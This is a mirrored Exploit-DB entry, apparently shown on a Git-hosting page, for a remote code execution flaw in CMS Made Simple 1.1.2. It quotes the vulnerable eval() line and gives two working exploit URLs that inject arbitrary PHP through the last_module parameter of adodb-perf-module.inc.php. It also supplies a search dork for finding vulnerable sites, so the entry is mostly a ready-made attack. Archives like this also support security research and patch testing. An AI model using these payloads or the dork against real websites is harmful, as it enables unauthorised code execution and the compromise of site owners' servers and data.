bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/4442.txt
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

25 lines
No EOL
1.4 KiB
Text
Raw Blame History

# o [bug] /"*._ _ #
# . . . .-*'` `*-.._.-'/ #
# o o < * )) , ( #
# . o `*-._`._(__.--*"`.\ #
# #
# vuln.: CMS Made Simple 1.1.2 Remote Code Execution Vulnerability #
# author: irk4z@yahoo.pl #
# download: #
# http://dev.cmsmadesimple.org/frs/download.php/1424/cmsmadesimple-1.1.2.zip #
# dork: "powered by CMS Made Simple version 1.1.2" #
# greetz: cOndemned, kacper, str0ke #
# code:
/lib/adodb_lite/adodb-perf-module.inc.php:
...
eval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { }');
...
# exploit:
http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=phpinfo();
http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=[ PHPCODE ]
# milw0rm.com [2007-09-21]
Reference in a new issue View git blame Copy permalink